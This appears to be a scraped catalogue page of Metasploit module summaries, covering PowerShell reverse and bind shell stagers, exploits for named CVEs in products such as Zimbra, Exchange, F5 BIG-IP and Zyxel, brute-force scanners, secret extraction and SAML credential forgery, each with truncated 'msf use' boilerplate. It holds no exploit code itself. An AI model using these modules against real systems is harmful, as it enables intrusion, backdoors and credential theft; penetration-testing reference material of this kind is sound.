Powershell Exec, Windows shellcode stage, Windows Reverse HTTP Stager (wininet)

Execute an x86 payload from a command via PowerShell. Custom shellcode stage. Tunnel communication over HTTP Windows wininet Module Options msf use payload/cmd/windows/powershell/custom/reversehttp msf payloadreversehttp show actions ...actions... msf payloadreversehttp set ACTION msf...

Powershell Exec, Windows shellcode stage, Reverse HTTPS Stager with Support for Custom Proxy

Execute an x86 payload from a command via PowerShell. Custom shellcode stage. Tunnel communication over HTTP using SSL with custom proxy support Module Options msf use payload/cmd/windows/powershell/custom/reversehttpsproxy msf payloadreversehttpsproxy show actions ...actions... msf...

Powershell Exec, Windows shellcode stage, Hidden Bind TCP Stager

Execute an x86 payload from a command via PowerShell. Custom shellcode stage. Listen for a connection from a hidden port and spawn a command shell to the allowed host. Module Options msf use payload/cmd/windows/powershell/custom/bindhiddentcp msf payloadbindhiddentcp show actions ...actions... ms...

Powershell Exec, Windows shellcode stage, Bind IPv6 TCP Stager (Windows x86)

Execute an x86 payload from a command via PowerShell. Custom shellcode stage. Listen for an IPv6 connection Windows x86 Module Options msf use payload/cmd/windows/powershell/custom/bindipv6tcp msf payloadbindipv6tcp show actions ...actions... msf payloadbindipv6tcp set ACTION msf payloadbindipv6t...

Powershell Exec, Windows shellcode stage, Reverse All-Port TCP Stager

Execute an x86 payload from a command via PowerShell. Custom shellcode stage. Try to connect back to the attacker, on all possible ports 1-65535, slowly Module Options msf use payload/cmd/windows/powershell/custom/reversetcpallports msf payloadreversetcpallports show actions ...actions... msf...

Powershell Exec, Windows shellcode stage, Reverse TCP Stager (DNS)

Execute an x86 payload from a command via PowerShell. Custom shellcode stage. Connect back to the attacker Module Options msf use payload/cmd/windows/powershell/custom/reversetcpdns msf payloadreversetcpdns show actions ...actions... msf payloadreversetcpdns set ACTION msf payloadreversetcpdns sh...

Powershell Exec, Windows shellcode stage, Reverse Ordinal TCP Stager (No NX or Win7)

Execute an x86 payload from a command via PowerShell. Custom shellcode stage. Connect back to the attacker Module Options msf use payload/cmd/windows/powershell/custom/reverseordtcp msf payloadreverseordtcp show actions ...actions... msf payloadreverseordtcp set ACTION msf payloadreverseordtcp sh...

Powershell Exec, Windows shellcode stage, Windows Reverse HTTPS Stager (wininet)

Execute an x86 payload from a command via PowerShell. Custom shellcode stage. Tunnel communication over HTTPS Windows wininet Module Options msf use payload/cmd/windows/powershell/custom/reversehttps msf payloadreversehttps show actions ...actions... msf payloadreversehttps set ACTION msf...

Powershell Exec, Windows shellcode stage, Reverse TCP Stager (IPv6)

Execute an x86 payload from a command via PowerShell. Custom shellcode stage. Connect back to the attacker over IPv6 Module Options msf use payload/cmd/windows/powershell/custom/reverseipv6tcp msf payloadreverseipv6tcp show actions ...actions... msf payloadreverseipv6tcp set ACTION msf...

Apache Spark Unauthenticated Command Injection RCE

This module exploits an unauthenticated command injection vulnerability in Apache Spark. Successful exploitation results in remote code execution under the context of the Spark application user. The command injection occurs because Spark checks the group membership of the user passed in the ?doAs...

Cisco ASA-X with FirePOWER Services Authenticated Command Injection

This module exploits an authenticated command injection vulnerability affecting Cisco ASA-X with FirePOWER Services. This exploit is executed through the ASA's ASDM web server and lands in the FirePower Services SFR module's Linux virtual machine as the root user. Access to the virtual machine...

ManageEngine DataSecurity Plus Xnode Enumeration

This module exploits default admin credentials for the DataEngine Xnode server in DataSecurity Plus versions prior to 6.0.1 6011 in order to dump the contents of Xnode data repositories tables, which may contain a limited amount of Active Directory information including domain names, host names,...

ManageEngine ADAudit Plus Xnode Enumeration

This module exploits default admin credentials for the DataEngine Xnode server in ADAudit Plus versions prior to 6.0.3 6032 in order to dump the contents of Xnode data repositories tables, which may contain a limited amount of Active Directory information including domain names, host names,...

Zyxel Firewall SUID Binary Privilege Escalation

This module exploits CVE-2022-30526, a local privilege escalation vulnerability that allows a low privileged user e.g. nobody escalate to root. The issue stems from a suid binary that allows all users to copy files as root. This module overwrites the firewall's crontab to execute an attacker...

ICPR Certificate Management

Request certificates via MS-ICPR Active Directory Certificate Services. Depending on the certificate template's configuration the resulting certificate can be used for various operations such as authentication. PFX certificate files that are saved are encrypted with a blank password. This module ...

ManageEngine ADAudit Plus CVE-2022-28219

This module exploits CVE-2022-28219, which is a pair of vulnerabilities in ManageEngine ADAudit Plus versions before build 7060: a path traversal in the /cewolf endpoint, and a blind XXE in, to upload and execute an executable file. Module Options msf use...

Zoho Password Manager Pro XML-RPC Java Deserialization

This module exploits a Java deserialization vulnerability in Zoho ManageEngine Pro before 12101 and PAM360 before 5510. Unauthenticated attackers can send a crafted XML-RPC request containing malicious serialized data to /xmlrpc to gain RCE as the SYSTEM user. Module Options msf use...

Microsoft Exchange Server ChainedSerializationBinder RCE

This module exploits vulnerabilities within the ChainedSerializationBinder as used in Exchange Server 2019 CU10, Exchange Server 2019 CU11, Exchange Server 2016 CU21, and Exchange Server 2016 CU22 all prior to Mar22SU. Note that authentication is required to exploit these vulnerabilities. Module...

Advantech iView NetworkServlet Command Injection

Versions of Advantech iView software below 5.7.04.6469 are vulnerable to an unauthenticated command injection vulnerability via the NetworkServlet endpoint. The database backup functionality passes a user-controlled parameter, backupfile to the mysqldump command. The sanitization functionality on...

VMware Workspace ONE Access CVE-2022-31660

VMware Workspace ONE Access contains a vulnerability whereby the horizon user can escalate their privileges to those of the root user by modifying a file and then restarting the vmware-certproxy service which invokes it. The service control is permitted via the sudo configuration without a...

Zimbra zmslapd arbitrary module load

This module exploits CVE-2022-37393, which is a vulnerability in Zimbra's sudo configuration that permits the zimbra user to execute the zmslapd binary as root with arbitrary parameters. As part of its intended functionality, zmslapd can load a user-defined configuration file, which includes...

Roxy-WI Prior to 6.1.1.0 Unauthenticated Command Injection RCE

This module exploits an unauthenticated command injection vulnerability in Roxy-WI prior to version 6.1.1.0. Successful exploitation results in remote code execution under the context of the web server user. Roxy-WI is an interface for managing HAProxy, Nginx and Keepalived servers. Module Option...

UnRAR Path Traversal (CVE-2022-30333)

This module creates a RAR file that exploits CVE-2022-30333, which is a path-traversal vulnerability in unRAR that can extract an arbitrary file to an arbitrary location on a Linux system. UnRAR fixed this vulnerability in version 6.12 open source version 6.1.7. The core issue is that when a...

Webmin Package Updates RCE

This module exploits an arbitrary command injection in Webmin versions prior to 1.997. Webmin uses the OS package manager apt, yum, etc. to perform package updates and installation. Due to a lack of input sanitization, it is possibe to inject arbitrary command that will be concatenated to the...

UnRAR Path Traversal in Zimbra (CVE-2022-30333)

This module creates a RAR file that can be emailed to a Zimbra server to exploit CVE-2022-30333. If successful, it plants a JSP-based backdoor in the public web directory, then executes that backdoor. The core vulnerability is a path-traversal issue in unRAR that can extract an arbitrary file to ...

Zip Path Traversal in Zimbra (mboximport) (CVE-2022-27925)

This module POSTs a ZIP file containing path traversal characters to the administrator interface for Zimbra Collaboration Suite. If successful, it plants a JSP-based backdoor within the web directory, then executes it. The core vulnerability is a path-traversal issue in Zimbra Collaboration Suite...

MobileIron Core Unauthenticated JNDI Injection RCE (via Log4Shell)

MobileIron Core is affected by the Log4Shell vulnerability whereby a JNDI string sent to the server will cause it to connect to the attacker and deserialize a malicious Java object. This results in OS command execution in the context of the tomcat user. This module will start an LDAP server that...

BACnet Scanner

Discover BACnet devices by broadcasting Who-is message, then poll discovered devices for properties including model name, software version, firmware revision and description. Module Options msf use auxiliary/scanner/scada/bacnetl3 msf auxiliarybacnetl3 show actions ...actions... msf...

Cisco PVC2300 POE Video Camera configuration download

This module exploits an information disclosure vulnerability in Cisco PVC2300 cameras in order to download the configuration file containing the admin credentials for the web interface. The module first performs a basic check to see if the target is likely Cisco PVC2300. If so, the module attempt...

Cassandra Web File Read Vulnerability

This module exploits an unauthenticated directory traversal vulnerability in Cassandra Web 'Cassandra Web' version 0.5.0 and earlier, allowing arbitrary file read with the web server privileges. This vulnerability occurred due to the disabled Rack::Protection module Module Options msf use...

Cisco ASA ASDM Brute-force Login

This module scans for the Cisco ASA ASDM landing page and performs login brute-force to identify valid credentials. Module Options msf use auxiliary/scanner/http/ciscoasaasdmbruteforce msf auxiliaryciscoasaasdmbruteforce show actions ...actions... msf auxiliaryciscoasaasdmbruteforce set ACTION ms...

Cisco ASA Clientless SSL VPN (WebVPN) Brute-force Login Utility

This module scans for Cisco ASA Clientless SSL VPN WebVPN web login portals and performs login brute-force to identify valid credentials. Module Options msf use auxiliary/scanner/http/ciscoasaclientlessvpn msf auxiliaryciscoasaclientlessvpn show actions ...actions... msf...

LDAP Query and Enumeration Module

This module allows users to query an LDAP server using either a custom LDAP query, or a set of LDAP queries under a specific category. Users can also specify a JSON or YAML file containing custom queries to be executed using the RUNQUERYFILE action. If this action is specified, then QUERYFILEPATH...

JBOSS EAP/AS Remoting Unified Invoker RCE

An unauthenticated attacker with network access to the JBOSS EAP/AS use exploit/multi/misc/jbossremotingunifiedinvokerrce msf exploitjbossremotingunifiedinvokerrce show targets ...targets... msf exploitjbossremotingunifiedinvokerrce set TARGET msf exploitjbossremotingunifiedinvokerrce show option...

Sourcegraph gitserver sshCommand RCE

A vulnerability exists within Sourcegraph's gitserver component that allows a remote attacker to execute arbitrary OS commands by modifying the core.sshCommand value within the git configuration. This command can then be triggered on demand by executing a git push operation. The vulnerability was...

FreeSWITCH Event Socket Login

This module tests FreeSWITCH Event Socket logins on a range of machines and report successful attempts. Module Options msf use auxiliary/scanner/misc/freeswitcheventsocketlogin msf auxiliaryfreeswitcheventsocketlogin show actions ...actions... msf auxiliaryfreeswitcheventsocketlogin set ACTION ms...

DFSCoerce

Coerce an authentication attempt over SMB to other machines via MS-DFSNM methods. Module Options msf use auxiliary/scanner/dcerpc/dfscoerce msf auxiliarydfscoerce show actions ...actions... msf auxiliarydfscoerce set ACTION msf auxiliarydfscoerce show options ...show and set options... msf...

SAMR Computer Management

Add, lookup and delete computer / machine accounts via MS-SAMR. By default standard active directory users can add up to 10 new computers to the domain. Administrative privileges however are required to delete the created accounts. Module Options msf use auxiliary/admin/dcerpc/samrcomputer msf...

Decrypt Citrix NetScaler Config Secrets

This module takes a Citrix NetScaler ns.conf configuration file as input and extracts secrets that have been stored with reversible encryption. The module supports legacy NetScaler encryption RC4 as well as the newer AES-256-ECB and AES-256-CBC encryption types. It is also possible to decrypt...

VMware vCenter Extract Secrets from vmdir / vmafd DB File

Grab certificates from the vCenter server vmdird and vmafd database files and adds them to loot. The vmdird MDB database file can be found on the live appliance under the path /storage/db/vmware-vmdir/data.mdb, and the DB vmafd is under path /storage/db/vmware-vmafd/afd.db. The vmdir database...

Atlassian Confluence Namespace OGNL Injection

This module exploits an OGNL injection in Atlassian Confluence servers. A specially crafted URI can be used to evaluate an OGNL expression resulting in OS command execution. Module Options msf use exploit/multi/http/atlassianconfluencenamespaceognlinjection msf...

Microsoft Office Word MSDTJS

This module generates a malicious Microsoft Word document that when loaded, will leverage the remote template feature to fetch an HTML document and then use the ms-msdt scheme to execute PowerShell code. Module Options msf use exploit/windows/fileformat/wordmsdtjsrce msf exploitwordmsdtjsrce show...

DotCMS RCE via Arbitrary File Upload.

When files are uploaded into dotCMS via the content API, but before they become content, dotCMS writes the file down in a temp directory. In the case of this vulnerability, dotCMS does not sanitize the filename passed in via the multipart request header and thus does not sanitize the temp file's...

MyBB Admin Control Code Injection RCE

This exploit module leverages an improper input validation vulnerability in MyBB prior to 1.8.30 to execute arbitrary code in the context of the user running the application. MyBB Admin Control setting page calls PHP eval function with an unsanitized user input. The exploit adds a new setting,...

Print Spooler Remote DLL Injection

The print spooler service can be abused by an authenticated remote attacker to load a DLL through a crafted DCERPC request, resulting in remote code execution as NT AUTHORITY\SYSTEM. This module uses the MS-RPRN vector which requires the Print Spooler service to be running. Module Options msf use...

Bookmarked Sites Retriever

This module discovers information about a target by retrieving their bookmarked websites on Google Chrome, Opera and Microsoft Edge. Module Options msf use post/windows/gather/getbookmarks msf postgetbookmarks show actions ...actions... msf postgetbookmarks set ACTION msf postgetbookmarks show...

Zyxel Firewall ZTP Unauthenticated Command Injection

This module exploits CVE-2022-30525, an unauthenticated remote command injection vulnerability affecting Zyxel firewalls with zero touch provisioning ZTP support. By sending a malicious setWanPortSt command containing an mtu field with a crafted OS command to the /ztp/cgi-bin/handler page, an...

VMware vCenter Forge SAML Authentication Credentials

This module forges valid SAML credentials for vCenter server using the vCenter SSO IdP certificate, IdP private key, and VMCA certificates as input objects; you must also provide the vCenter SSO domain name and vCenter FQDN. The module will return a session cookie for the /ui path that grants...

F5 BIG-IP iControl RCE via REST Authentication Bypass

This module exploits an authentication bypass vulnerability in the F5 BIG-IP iControl REST service to gain access to the admin account, which is capable of executing commands through the /mgmt/tm/util/bash endpoint. Successful exploitation results in remote code execution as the root user. Module...

Powershell Exec, Reverse TCP Stager with UUID Support (Windows x64)

Execute an x64 payload from a command via PowerShell. Connect back to the attacker with UUID Support Windows x64 Module Options msf use payload/cmd/windows/powershell/x64/vncinject/reversetcpuuid msf payloadreversetcpuuid show actions ...actions... msf payloadreversetcpuuid set ACTION msf...